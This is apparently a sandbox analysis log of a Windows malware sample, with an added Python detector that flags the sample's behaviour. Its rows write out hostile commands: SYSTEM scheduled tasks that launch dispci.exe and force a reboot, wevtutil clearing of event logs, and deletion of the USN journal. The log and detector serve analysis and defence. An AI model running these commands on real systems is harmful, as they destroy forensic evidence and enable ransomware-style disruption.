Source: C:\Windows\System32\conhost.exe | Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7364:120:WilError_03
Source: C:\Windows\SysWOW64\rundll32.exe | Mutant created: \Sessions\1\BaseNamedObjects\8C5D643B3AD6FDE5
Source: C:\Windows\System32\conhost.exe | Mutant created: \BaseNamedObjects\Local\SM0:7936:120:WilError_03
Source: C:\Windows\System32\conhost.exe | Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7508:120:WilError_03
Source: C:\Windows\System32\conhost.exe | Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:4644:120:WilError_03
Source: C:\Windows\System32\conhost.exe | Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:8040:120:WilError_03
Source: C:\Windows\System32\conhost.exe | Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7612:120:WilError_03
Source: C:\Windows\System32\conhost.exe | Mutant created: \BaseNamedObjects\Local\SM0:7876:120:WilError_03
Source: LisectAVT_2403002C_35.exe | Static PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
Source: C:\Users\user\Desktop\LisectAVT_2403002C_35.exe | Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers
Source: C:\Users\user\Desktop\LisectAVT_2403002C_35.exe | Process created: C:\Windows\SysWOW64\rundll32.exe C:\Windows\system32\rundll32.exe C:\Windows\infpub.dat,#1 15
Source: LisectAVT_2403002C_35.exe | ReversingLabs: Detection: 86%
Source: C:\Users\user\Desktop\LisectAVT_2403002C_35.exe | File read: C:\Users\user\Desktop\LisectAVT_2403002C_35.exe
Source: unknown | Process created: C:\Users\user\Desktop\LisectAVT_2403002C_35.exe "C:\Users\user\Desktop\LisectAVT_2403002C_35.exe"
Source: C:\Users\user\Desktop\LisectAVT_2403002C_35.exe | Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\user\Desktop\LisectAVT_2403002C_35.exe | Process created: C:\Windows\SysWOW64\rundll32.exe C:\Windows\system32\rundll32.exe C:\Windows\infpub.dat,#1 15
Source: C:\Windows\SysWOW64\rundll32.exe | Process created: C:\Windows\SysWOW64\cmd.exe /c schtasks /Delete /F /TN rhaegal
Source: C:\Windows\SysWOW64\cmd.exe | Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\SysWOW64\cmd.exe | Process created: C:\Windows\SysWOW64\schtasks.exe schtasks /Delete /F /TN rhaegal
Source: unknown | Process created: C:\Windows\System32\svchost.exe C:\Windows\System32\svchost.exe -k NetworkService -p
Source: unknown | Process created: C:\Windows\System32\SgrmBroker.exe C:\Windows\system32\SgrmBroker.exe
Source: unknown | Process created: C:\Windows\System32\svchost.exe C:\Windows\System32\svchost.exe -k LocalSystemNetworkRestricted -p -s StorSvc
Source: unknown | Process created: C:\Windows\System32\svchost.exe C:\Windows\system32\svchost.exe -k UnistackSvcGroup
Source: unknown | Process created: C:\Windows\System32\svchost.exe C:\Windows\System32\svchost.exe -k wsappx -p -s ClipSVC
Source: unknown | Process created: C:\Windows\System32\svchost.exe C:\Windows\system32\svchost.exe -k netsvcs -p -s UsoSvc
Source: unknown | Process created: C:\Windows\System32\svchost.exe C:\Windows\System32\svchost.exe -k LocalServiceNetworkRestricted -p -s wscsvc
Source: C:\Windows\SysWOW64\rundll32.exe | Process created: C:\Windows\SysWOW64\cmd.exe /c schtasks /Create /RU SYSTEM /SC ONSTART /TN rhaegal /TR "C:\Windows\system32\cmd.exe /C Start \"\" \"C:\Windows\dispci.exe\" -id 1283680486 && exit"
Source: C:\Windows\SysWOW64\cmd.exe | Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\SysWOW64\rundll32.exe | Process created: C:\Windows\SysWOW64\cmd.exe /c schtasks /Create /SC once /TN drogon /RU SYSTEM /TR "C:\Windows\system32\shutdown.exe /r /t 0 /f" /ST 02:36:00
Source: C:\Windows\SysWOW64\cmd.exe | Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\SysWOW64\rundll32.exe | Process created: C:\Windows\D99F.tmp "C:\Windows\D99F.tmp" \\.\pipe\{0196DA97-052C-4D78-8175-28281F8F1CD9}
Source: C:\Windows\SysWOW64\cmd.exe | Process created: C:\Windows\SysWOW64\schtasks.exe schtasks /Create /RU SYSTEM /SC ONSTART /TN rhaegal /TR "C:\Windows\system32\cmd.exe /C Start \"\" \"C:\Windows\dispci.exe\" -id 1283680486 && exit"
Source: C:\Windows\SysWOW64\cmd.exe | Process created: C:\Windows\SysWOW64\schtasks.exe schtasks /Create /SC once /TN drogon /RU SYSTEM /TR "C:\Windows\system32\shutdown.exe /r /t 0 /f" /ST 02:36:00
Source: C:\Windows\D99F.tmp | Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\SysWOW64\rundll32.exe | Process created: C:\Windows\SysWOW64\cmd.exe /c wevtutil cl Setup & wevtutil cl System & wevtutil cl Security & wevtutil cl Application & fsutil usn deletejournal /D C:
Source: C:\Windows\SysWOW64\cmd.exe | Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\SysWOW64\cmd.exe | Process created: C:\Windows\SysWOW64\wevtutil.exe wevtutil cl Setup
Source: C:\Windows\SysWOW64\cmd.exe | Process created: C:\Windows\SysWOW64\wevtutil.exe wevtutil cl System
Source: C:\Windows\SysWOW64\cmd.exe | Process created: C:\Windows\SysWOW64\wevtutil.exe wevtutil cl Security
Source: C:\Windows\SysWOW64\cmd.exe | Process created: C:\Windows\SysWOW64\wevtutil.exe wevtutil cl Application
Source: C:\Windows\SysWOW64\cmd.exe | Process created: C:\Windows\SysWOW64\fsutil.exe fsutil usn deletejournal /D C:
Source: unknown | Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /C Start "" "C:\Windows\dispci.exe" -id 1283680486 && exit
Source: C:\Windows\System32\cmd.exe | Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\System32\cmd.exe | Process created: C:\Windows\dispci.exe "C:\Windows\dispci.exe" -id 1283680486
Source: C:\Windows\dispci.exe | Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\dispci.exe | Process created: C:\Windows\SysWOW64\cmd.exe /c schtasks /Delete /F /TN rhaegal
Source: C:\Windows\SysWOW64\cmd.exe | Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: unknown | Process created: C:\Windows\System32\svchost.exe C:\Windows\system32\svchost.exe -k LocalService -s W32Time
Source: C:\Windows\SysWOW64\cmd.exe | Process created: C:\Windows\SysWOW64\schtasks.exe schtasks /Delete /F /TN rhaegal
Source: C:\Windows\SysWOW64\rundll32.exe | Process created: C:\Windows\SysWOW64\cmd.exe /c schtasks /Delete /F /TN drogon
Source: C:\Windows\SysWOW64\cmd.exe | Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: unknown | Process created: C:\Windows\System32\LogonUI.exe "LogonUI.exe" /flags:0x4 /state0:0xa3f80855 /state1:0x41c64e6d
Source: C:\Windows\SysWOW64\cmd.exe | Process created: C:\Windows\SysWOW64\schtasks.exe schtasks /Delete /F /TN drogon
Source: unknown | Process created: C:\Windows\System32\svchost.exe C:\Windows\System32\svchost.exe -k netsvcs -p -s BITS
Source: unknown | Process created: C:\Windows\System32\svchost.exe C:\Windows\System32\svchost.exe -k LocalService -p -s LicenseManager
Source: unknown | Process created: C:\Windows\System32\fontdrvhost.exe "fontdrvhost.exe"
Source: unknown | Process created: C:\Windows\System32\LogonUI.exe "LogonUI.exe" /flags:0x2 /state0:0xa3f8d855 /state1:0x41c64e6d
Source: unknown | Process created: C:\Windows\System32\fontdrvhost.exe "fontdrvhost.exe"
Source: C:\Users\user\Desktop\LisectAVT_2403002C_35.exe | Process created: C:\Windows\SysWOW64\rundll32.exe C:\Windows\system32\rundll32.exe C:\Windows\infpub.dat,#1 15
Source: C:\Windows\SysWOW64\rundll32.exe | Process created: C:\Windows\SysWOW64\cmd.exe /c schtasks /Delete /F /TN rhaegal
Source: C:\Windows\SysWOW64\rundll32.exe | Process created: C:\Windows\SysWOW64\cmd.exe /c schtasks /Create /RU SYSTEM /SC ONSTART /TN rhaegal /TR "C:\Windows\system32\cmd.exe /C Start \"\" \"C:\Windows\dispci.exe\" -id 1283680486 && exit"
Source: C:\Windows\SysWOW64\rundll32.exe | Process created: C:\Windows\SysWOW64\cmd.exe /c schtasks /Create /SC once /TN drogon /RU SYSTEM /TR "C:\Windows\system32\shutdown.exe /r /t 0 /f" /ST 02:36:00
Source: C:\Windows\SysWOW64\rundll32.exe | Process created: C:\Windows\D99F.tmp "C:\Windows\D99F.tmp" \\.\pipe\{0196DA97-052C-4D78-8175-28281F8F1CD9}
Source: C:\Windows\SysWOW64\rundll32.exe | Process created: C:\Windows\SysWOW64\cmd.exe /c wevtutil cl Setup & wevtutil cl System & wevtutil cl Security & wevtutil cl Application & fsutil usn deletejournal /D C:
Source: C:\Windows\SysWOW64\rundll32.exe | Process created: C:\Windows\SysWOW64\cmd.exe /c schtasks /Delete /F /TN drogon
Source: C:\Windows\SysWOW64\cmd.exe | Process created: C:\Windows\SysWOW64\schtasks.exe schtasks /Delete /F /TN rhaegal
Source: C:\Windows\System32\svchost.exe | Process created: unknown unknown
Source: C:\Windows\SysWOW64\cmd.exe | Process created: C:\Windows\SysWOW64\schtasks.exe schtasks /Create /RU SYSTEM /SC ONSTART /TN rhaegal /TR "C:\Windows\system32\cmd.exe /C Start \"\" \"C:\Windows\dispci.exe\" -id 1283680486 && exit"
Source: C:\Windows\SysWOW64\cmd.exe | Process created: C:\Windows\SysWOW64\schtasks.exe schtasks /Create /SC once /TN drogon /RU SYSTEM /TR "C:\Windows\system32\shutdown.exe /r /t 0 /f" /ST 02:36:00
Source: C:\Windows\SysWOW64\cmd.exe | Process created: C:\Windows\SysWOW64\wevtutil.exe wevtutil cl Setup
Source: C:\Windows\SysWOW64\cmd.exe | Process created: C:\Windows\SysWOW64\wevtutil.exe wevtutil cl System
Source: C:\Windows\SysWOW64\cmd.exe | Process created: C:\Windows\SysWOW64\wevtutil.exe wevtutil cl Security
Source: C:\Windows\SysWOW64\cmd.exe | Process created: C:\Windows\SysWOW64\wevtutil.exe wevtutil cl Application
Source: C:\Windows\SysWOW64\cmd.exe | Process created: C:\Windows\SysWOW64\fsutil.exe fsutil usn deletejournal /D C:
Source: C:\Windows\System32\cmd.exe | Process created: C:\Windows\dispci.exe "C:\Windows\dispci.exe" -id 1283680486
Source: C:\Windows\dispci.exe | Process created: C:\Windows\SysWOW64\cmd.exe /c schtasks /Delete /F /TN rhaegal
Source: C:\Windows\SysWOW64\cmd.exe | Process created: C:\Windows\SysWOW64\schtasks.exe schtasks /Delete /F /TN rhaegal
Source: C:\Windows\SysWOW64\cmd.exe | Process created: C:\Windows\SysWOW64\schtasks.exe schtasks /Delete /F /TN drogon
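Added example, not part of the Joe Sandbox report: a small Python detector that applies the checks a SOC would derive from the process-creation rows above (rundll32 loading a module that is not a .dll, scheduled tasks created to run as SYSTEM, a SYSTEM task that forces a reboot, wevtutil log clearing, USN journal deletion) to a constructed event list transcribed from those rows, plus one benign rundll32 control event that must not fire. The event fields (parent, image, cmdline) and the rule names are this example's own choices, not Joe Sandbox or Sigma identifiers.

```python
import re

# Constructed sample events, transcribed from the "Process created" rows of the
# report above, plus one benign control event (explorer launching a Control Panel
# applet through rundll32) that none of the rules should match.
EVENTS = [
    {"parent": r"C:\Users\user\Desktop\LisectAVT_2403002C_35.exe",
     "image": r"C:\Windows\SysWOW64\rundll32.exe",
     "cmdline": r"C:\Windows\system32\rundll32.exe C:\Windows\infpub.dat,#1 15"},
    {"parent": r"C:\Windows\SysWOW64\cmd.exe",
     "image": r"C:\Windows\SysWOW64\schtasks.exe",
     "cmdline": r'schtasks /Create /RU SYSTEM /SC ONSTART /TN rhaegal /TR "C:\Windows\system32\cmd.exe /C Start \"\" \"C:\Windows\dispci.exe\" -id 1283680486 && exit"'},
    {"parent": r"C:\Windows\SysWOW64\cmd.exe",
     "image": r"C:\Windows\SysWOW64\schtasks.exe",
     "cmdline": r'schtasks /Create /SC once /TN drogon /RU SYSTEM /TR "C:\Windows\system32\shutdown.exe /r /t 0 /f" /ST 02:36:00'},
    {"parent": r"C:\Windows\SysWOW64\cmd.exe",
     "image": r"C:\Windows\SysWOW64\wevtutil.exe",
     "cmdline": "wevtutil cl Security"},
    {"parent": r"C:\Windows\SysWOW64\cmd.exe",
     "image": r"C:\Windows\SysWOW64\fsutil.exe",
     "cmdline": "fsutil usn deletejournal /D C:"},
    {"parent": r"C:\Windows\SysWOW64\cmd.exe",
     "image": r"C:\Windows\SysWOW64\schtasks.exe",
     "cmdline": "schtasks /Delete /F /TN rhaegal"},
    {"parent": r"C:\Windows\explorer.exe",           # benign control event
     "image": r"C:\Windows\System32\rundll32.exe",
     "cmdline": r"C:\Windows\System32\rundll32.exe C:\Windows\System32\shell32.dll,Control_RunDLL"},
]


def _image_is(ev, name):
    return ev["image"].lower().endswith("\\" + name)


def rule_rundll32_non_dll_module(ev):
    """rundll32 asked to load a module whose extension is not .dll (here infpub.dat)."""
    if not _image_is(ev, "rundll32.exe"):
        return False
    m = re.search(r'rundll32\.exe"?\s+"?([^\s",]+)', ev["cmdline"], re.I)
    return bool(m) and not m.group(1).lower().endswith(".dll")


def rule_schtasks_create_as_system(ev):
    """schtasks /Create with /RU SYSTEM (the rhaegal and drogon tasks)."""
    c = ev["cmdline"].lower()
    return _image_is(ev, "schtasks.exe") and "/create" in c and "/ru system" in c


def rule_schtasks_forced_reboot(ev):
    """A SYSTEM task whose action is a forced restart (shutdown /r)."""
    c = ev["cmdline"].lower()
    return rule_schtasks_create_as_system(ev) and "shutdown" in c and " /r " in c


def rule_eventlog_clear(ev):
    """wevtutil cl <log> / clear-log <log>."""
    argv = ev["cmdline"].lower().split()
    return _image_is(ev, "wevtutil.exe") and len(argv) >= 3 and argv[1] in ("cl", "clear-log")


def rule_usn_journal_delete(ev):
    """fsutil usn deletejournal, which removes the change journal forensic trail."""
    c = ev["cmdline"].lower()
    return _image_is(ev, "fsutil.exe") and "usn" in c and "deletejournal" in c


RULES = {
    "rundll32_non_dll_module": rule_rundll32_non_dll_module,
    "schtasks_create_as_system": rule_schtasks_create_as_system,
    "schtasks_forced_reboot": rule_schtasks_forced_reboot,
    "eventlog_clear": rule_eventlog_clear,
    "usn_journal_delete": rule_usn_journal_delete,
}


def evaluate(events):
    """Return {rule_name: [matching command lines]} in event order."""
    hits = {name: [] for name in RULES}
    for ev in events:
        for name, fn in RULES.items():
            if fn(ev):
                hits[name].append(ev["cmdline"])
    return hits


if __name__ == "__main__":
    for name, matches in evaluate(EVENTS).items():
        print(f"{name}: {len(matches)} hit(s)")
        for m in matches:
            print("   ", m)
```

Each rule keys on the image name plus the argument shape rather than on the task names rhaegal and drogon, so the same logic still fires on a build that renames the tasks; the task names belong in an IOC list, not in the detection condition.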
Source: C:\Users\user\Desktop\LisectAVT_2403002C_35.exe | Section loaded: apphelp.dll
Source: C:\Windows\SysWOW64\schtasks.exe | Section loaded: kernel.appcore.dll
Source: C:\Windows\SysWOW64\schtasks.exe | Section loaded: taskschd.dll
Source: C:\Windows\SysWOW64\schtasks.exe | Section loaded: sspicli.dll
Source: C:\Windows\System32\svchost.exe | Section loaded: kernel.appcore.dll
Source: C:\Windows\System32\svchost.exe | Section loaded: moshost.dll
Source: C:\Windows\System32\svchost.exe | Section loaded: mapsbtsvc.dll
Source: C:\Windows\System32\svchost.exe | Section loaded: mosstorage.dll
Source: C:\Windows\System32\svchost.exe | Section loaded: ztrace_maps.dll
Source: C:\Windows\System32\svchost.exe | Section loaded: ztrace_maps.dll
Source: C:\Windows\System32\svchost.exe | Section loaded: ztrace_maps.dll
Source: C:\Windows\System32\svchost.exe | Section loaded: bcp47langs.dll
Source: C:\Windows\System32\svchost.exe | Section loaded: mapconfiguration.dll
Source: C:\Windows\System32\svchost.exe | Section loaded: winhttp.dll
Source: C:\Windows\System32\svchost.exe | Section loaded: wldp.dll
Source: C:\Windows\System32\svchost.exe | Section loaded: windows.storage.dll
Source: C:\Windows\System32\svchost.exe | Section loaded: profapi.dll
Source: C:\Windows\System32\svchost.exe | Section loaded: kernel.appcore.dll
Source: C:\Windows\System32\svchost.exe | Section loaded: storsvc.dll
Source: C:\Windows\System32\svchost.exe | Section loaded: devobj.dll
Source: C:\Windows\System32\svchost.exe | Section loaded: fltlib.dll
Source: C:\Windows\System32\svchost.exe | Section loaded: ntmarta.dll
Source: C:\Windows\System32\svchost.exe | Section loaded: bcd.dll
Source: C:\Windows\System32\svchost.exe | Section loaded: wer.dll
Source: C:\Windows\System32\svchost.exe | Section loaded: winhttp.dll
Source: C:\Windows\System32\svchost.exe | Section loaded: cabinet.dll
Source: C:\Windows\System32\svchost.exe | Section loaded: wldp.dll
Source: C:\Windows\System32\svchost.exe | Section loaded: windows.storage.dll
Source: C:\Windows\System32\svchost.exe | Section loaded: appxdeploymentclient.dll
Source: C:\Windows\System32\svchost.exe | Section loaded: storageusage.dll
Source: C:\Windows\System32\svchost.exe | Section loaded: userenv.dll
Source: C:\Windows\System32\svchost.exe | Section loaded: profapi.dll
Source: C:\Windows\System32\svchost.exe | Section loaded: sspicli.dll
Source: C:\Windows\System32\svchost.exe | Section loaded: propsys.dll
Source: C:\Windows\System32\svchost.exe | Section loaded: kernel.appcore.dll
Source: C:\Windows\System32\svchost.exe | Section loaded: aphostservice.dll
Source: C:\Windows\System32\svchost.exe | Section loaded: networkhelper.dll
Source: C:\Windows\System32\svchost.exe | Section loaded: userdataplatformhelperutil.dll
Source: C:\Windows\System32\svchost.exe | Section loaded: umpdc.dll
Source: C:\Windows\System32\svchost.exe | Section loaded: syncutil.dll
Source: C:\Windows\System32\svchost.exe | Section loaded: mccspal.dll
          Source: C:\Windows\System32\svchost.exeSection loaded: syncutil.dllJump to behavior
          Source: C:\Windows\System32\svchost.exeSection loaded: vaultcli.dllJump to behavior
          Source: C:\Windows\System32\svchost.exeSection loaded: wintypes.dllJump to behavior
          Source: C:\Windows\System32\svchost.exeSection loaded: dmcfgutils.dllJump to behavior
          Source: C:\Windows\System32\svchost.exeSection loaded: msvcp110_win.dllJump to behavior
          Source: C:\Windows\System32\svchost.exeSection loaded: dmcmnutils.dllJump to behavior
          Source: C:\Windows\System32\svchost.exeSection loaded: dmxmlhelputils.dllJump to behavior
          Source: C:\Windows\System32\svchost.exeSection loaded: policymanager.dllJump to behavior
          Source: C:\Windows\System32\svchost.exeSection loaded: cryptsp.dllJump to behavior
          Source: C:\Windows\System32\svchost.exeSection loaded: msvcp110_win.dllJump to behavior
          Source: C:\Windows\System32\svchost.exeSection loaded: msvcp110_win.dllJump to behavior
          Source: C:\Windows\System32\svchost.exeSection loaded: xmllite.dllJump to behavior
          Source: C:\Windows\System32\svchost.exeSection loaded: inproclogger.dllJump to behavior
          Source: C:\Windows\System32\svchost.exeSection loaded: wldp.dllJump to behavior
          Source: C:\Windows\System32\svchost.exeSection loaded: profapi.dllJump to behavior
          Source: C:\Windows\System32\svchost.exeSection loaded: sspicli.dllJump to behavior
          Source: C:\Windows\System32\svchost.exeSection loaded: flightsettings.dllJump to behavior
          Source: C:\Windows\System32\svchost.exeSection loaded: windows.networking.connectivity.dllJump to behavior
          Source: C:\Windows\System32\svchost.exeSection loaded: npmproxy.dllJump to behavior
          Source: C:\Windows\System32\svchost.exeSection loaded: iertutil.dllJump to behavior
          Source: C:\Windows\System32\svchost.exeSection loaded: msv1_0.dllJump to behavior
          Source: C:\Windows\System32\svchost.exeSection loaded: ntlmshared.dllJump to behavior
          Source: C:\Windows\System32\svchost.exeSection loaded: cryptdll.dllJump to behavior
          Source: C:\Windows\System32\svchost.exeSection loaded: synccontroller.dllJump to behavior
          Source: C:\Windows\System32\svchost.exeSection loaded: pimstore.dllJump to behavior
          Source: C:\Windows\System32\svchost.exeSection loaded: aphostclient.dllJump to behavior
          Source: C:\Windows\System32\svchost.exeSection loaded: accountaccessor.dllJump to behavior
          Source: C:\Windows\System32\svchost.exeSection loaded: dsclient.dllJump to behavior
          Source: C:\Windows\System32\svchost.exeSection loaded: powrprof.dllJump to behavior
          Source: C:\Windows\System32\svchost.exeSection loaded: powrprof.dllJump to behavior
          Source: C:\Windows\System32\svchost.exeSection loaded: systemeventsbrokerclient.dllJump to behavior
          Source: C:\Windows\System32\svchost.exeSection loaded: userdatalanguageutil.dllJump to behavior
          Source: C:\Windows\System32\svchost.exeSection loaded: mccsengineshared.dllJump to behavior
          Source: C:\Windows\System32\svchost.exeSection loaded: ntmarta.dllJump to behavior
          Source: C:\Windows\System32\svchost.exeSection loaded: cemapi.dllJump to behavior
          Source: C:\Windows\System32\svchost.exeSection loaded: userdatatypehelperutil.dllJump to behavior
          Source: C:\Windows\System32\svchost.exeSection loaded: phoneutil.dllJump to behavior
          Source: C:\Windows\System32\svchost.exeSection loaded: onecorecommonproxystub.dllJump to behavior
          Source: C:\Windows\System32\svchost.exeSection loaded: execmodelproxy.dllJump to behavior
          Source: C:\Windows\System32\svchost.exeSection loaded: rmclient.dllJump to behavior
          Source: C:\Windows\System32\svchost.exeSection loaded: msasn1.dllJump to behavior
          Source: C:\Windows\System32\svchost.exeSection loaded: kernel.appcore.dllJump to behavior
          Source: C:\Windows\System32\svchost.exeSection loaded: usosvc.dllJump to behavior
          Source: C:\Windows\System32\svchost.exeSection loaded: powrprof.dllJump to behavior
          Source: C:\Windows\System32\svchost.exeSection loaded: umpdc.dllJump to behavior
          Source: C:\Windows\System32\svchost.exeSection loaded: profapi.dllJump to behavior
          Source: C:\Windows\System32\svchost.exeSection loaded: updatepolicy.dllJump to behavior
          Source: C:\Windows\System32\svchost.exeSection loaded: cabinet.dllJump to behavior
          Source: C:\Windows\System32\svchost.exeSection loaded: msasn1.dllJump to behavior
          Source: C:\Windows\System32\svchost.exeSection loaded: wldp.dllJump to behavior
          Source: C:\Windows\System32\svchost.exeSection loaded: taskschd.dllJump to behavior
          Source: C:\Windows\System32\svchost.exeSection loaded: sspicli.dllJump to behavior
          Source: C:\Windows\System32\svchost.exeSection loaded: upshared.dllJump to behavior
          Source: C:\Windows\System32\svchost.exeSection loaded: winhttp.dllJump to behavior
          Source: C:\Windows\System32\svchost.exeSection loaded: dpapi.dllJump to behavior
          Source: C:\Windows\System32\svchost.exeSection loaded: usocoreps.dllJump to behavior
          Source: C:\Windows\System32\svchost.exeSection loaded: usoapi.dllJump to behavior
          Source: C:\Windows\D99F.tmpSection loaded: apphelp.dllJump to behavior
          Source: C:\Windows\SysWOW64\schtasks.exeSection loaded: kernel.appcore.dllJump to behavior
          Source: C:\Windows\SysWOW64\schtasks.exeSection loaded: taskschd.dllJump to behavior
          Source: C:\Windows\SysWOW64\schtasks.exeSection loaded: sspicli.dllJump to behavior
          Source: C:\Windows\SysWOW64\schtasks.exeSection loaded: xmllite.dllJump to behavior
          Source: C:\Windows\SysWOW64\schtasks.exeSection loaded: kernel.appcore.dllJump to behavior
          Source: C:\Windows\SysWOW64\schtasks.exeSection loaded: taskschd.dllJump to behavior
          Source: C:\Windows\SysWOW64\schtasks.exeSection loaded: sspicli.dllJump to behavior
          Source: C:\Windows\SysWOW64\schtasks.exeSection loaded: xmllite.dllJump to behavior
          Source: C:\Windows\SysWOW64\wevtutil.exeSection loaded: wevtapi.dllJump to behavior
          Source: C:\Windows\SysWOW64\wevtutil.exeSection loaded: kernel.appcore.dllJump to behavior
          Source: C:\Windows\SysWOW64\wevtutil.exeSection loaded: wevtapi.dllJump to behavior
          Source: C:\Windows\SysWOW64\wevtutil.exeSection loaded: kernel.appcore.dllJump to behavior
          Source: C:\Windows\SysWOW64\wevtutil.exeSection loaded: wevtapi.dllJump to behavior
          Source: C:\Windows\SysWOW64\wevtutil.exeSection loaded: kernel.appcore.dllJump to behavior
          Source: C:\Windows\SysWOW64\wevtutil.exeSection loaded: wevtapi.dllJump to behavior
          Source: C:\Windows\SysWOW64\wevtutil.exeSection loaded: kernel.appcore.dllJump to behavior
          Source: C:\Windows\System32\cmd.exeSection loaded: apphelp.dllJump to behavior
          Source: C:\Windows\dispci.exeSection loaded: apphelp.dllJump to behavior
          Source: C:\Windows\dispci.exeSection loaded: netapi32.dllJump to behavior
          Source: C:\Windows\dispci.exeSection loaded: netutils.dllJump to behavior
          Source: C:\Windows\dispci.exeSection loaded: cryptsp.dllJump to behavior
          Source: C:\Windows\dispci.exeSection loaded: rsaenh.dllJump to behavior
          Source: C:\Windows\dispci.exeSection loaded: sspicli.dllJump to behavior
          Source: C:\Windows\dispci.exeSection loaded: profapi.dllJump to behavior
          Source: C:\Windows\dispci.exeSection loaded: dpapi.dllJump to behavior
          Source: C:\Windows\dispci.exeSection loaded: cryptbase.dllJump to behavior
          Source: C:\Windows\dispci.exeSection loaded: kernel.appcore.dllJump to behavior
          Source: C:\Windows\dispci.exeSection loaded: windows.storage.dllJump to behavior
          Source: C:\Windows\dispci.exeSection loaded: wldp.dllJump to behavior
          Source: C:\Windows\dispci.exeSection loaded: propsys.dllJump to behavior
          Source: C:\Windows\dispci.exeSection loaded: linkinfo.dllJump to behavior
          Source: C:\Windows\dispci.exeSection loaded: ntshrui.dllJump to behavior
          Source: C:\Windows\dispci.exeSection loaded: srvcli.dllJump to behavior
          Source: C:\Windows\dispci.exeSection loaded: cscapi.dllJump to behavior
          Source: C:\Windows\System32\svchost.exeSection loaded: kernel.appcore.dllJump to behavior
          Source: C:\Windows\System32\svchost.exeSection loaded: w32time.dllJump to behavior
          Source: C:\Windows\System32\svchost.exeSection loaded: logoncli.dllJump to behavior
          Source: C:\Windows\System32\svchost.exeSection loaded: powrprof.dllJump to behavior
          Source: C:\Windows\System32\svchost.exeSection loaded: umpdc.dllJump to behavior
          Source: C:\Windows\System32\svchost.exeSection loaded: wldp.dllJump to behavior
          Source: C:\Windows\System32\svchost.exeSection loaded: mswsock.dllJump to behavior
          Source: C:\Windows\System32\svchost.exeSection loaded: userenv.dllJump to behavior
          Source: C:\Windows\System32\svchost.exeSection loaded: gpapi.dllJump to behavior
          Source: C:\Windows\System32\svchost.exeSection loaded: dsrole.dllJump to behavior
          Source: C:\Windows\System32\svchost.exeSection loaded: sspicli.dllJump to behavior
          Source: C:\Windows\System32\svchost.exeSection loaded: iphlpapi.dllJump to behavior
          Source: C:\Windows\System32\svchost.exeSection loaded: vmictimeprovider.dllJump to behavior
          Source: C:\Windows\System32\svchost.exeSection loaded: dnsapi.dllJump to behavior
          Source: C:\Windows\System32\svchost.exeSection loaded: rasadhlp.dllJump to behavior
          Source: C:\Windows\System32\svchost.exeSection loaded: fwpuclnt.dllJump to behavior
          Source: C:\Windows\SysWOW64\schtasks.exeSection loaded: kernel.appcore.dllJump to behavior
          Source: C:\Windows\SysWOW64\schtasks.exeSection loaded: taskschd.dllJump to behavior
          Source: C:\Windows\SysWOW64\schtasks.exeSection loaded: sspicli.dllJump to behavior
          Source: C:\Windows\System32\LogonUI.exeSection loaded: kernel.appcore.dllJump to behavior
          Source: C:\Windows\System32\LogonUI.exeSection loaded: uxtheme.dllJump to behavior
          Source: C:\Windows\System32\LogonUI.exeSection loaded: logoncontroller.dllJump to behavior
          Source: C:\Windows\System32\LogonUI.exeSection loaded: umpdc.dllJump to behavior
          Source: C:\Windows\System32\LogonUI.exeSection loaded: dxgi.dllJump to behavior
          Source: C:\Windows\System32\LogonUI.exeSection loaded: powrprof.dllJump to behavior
          Source: C:\Windows\System32\LogonUI.exeSection loaded: userenv.dllJump to behavior
          Source: C:\Windows\System32\LogonUI.exeSection loaded: powrprof.dllJump to behavior
          Source: C:\Windows\System32\LogonUI.exeSection loaded: slc.dllJump to behavior
          Source: C:\Windows\System32\LogonUI.exeSection loaded: sppc.dllJump to behavior
          Source: C:\Windows\System32\LogonUI.exeSection loaded: dsreg.dllJump to behavior
          Source: C:\Windows\System32\LogonUI.exeSection loaded: msvcp110_win.dllJump to behavior
          Source: C:\Windows\System32\LogonUI.exeSection loaded: cryptsp.dllJump to behavior
          Source: C:\Windows\System32\LogonUI.exeSection loaded: dwmapi.dllJump to behavior
          Source: C:\Windows\System32\LogonUI.exeSection loaded: wtsapi32.dllJump to behavior
          Source: C:\Windows\System32\LogonUI.exeSection loaded: winsta.dllJump to behavior
          Source: C:\Windows\System32\LogonUI.exeSection loaded: windows.ui.logon.dllJump to behavior
          Source: C:\Windows\System32\LogonUI.exeSection loaded: wincorlib.dllJump to behavior
          Source: C:\Windows\System32\LogonUI.exeSection loaded: dcomp.dllJump to behavior
          Source: C:\Windows\System32\LogonUI.exeSection loaded: windows.ui.xamlhost.dllJump to behavior
          Source: C:\Windows\System32\LogonUI.exeSection loaded: mrmcorer.dllJump to behavior
          Source: C:\Windows\System32\LogonUI.exeSection loaded: windows.ui.dllJump to behavior
          Source: C:\Windows\System32\LogonUI.exeSection loaded: windowmanagementapi.dllJump to behavior
          Source: C:\Windows\System32\LogonUI.exeSection loaded: textinputframework.dllJump to behavior
          Source: C:\Windows\System32\LogonUI.exeSection loaded: inputhost.dllJump to behavior
          Source: C:\Windows\System32\LogonUI.exeSection loaded: wintypes.dllJump to behavior
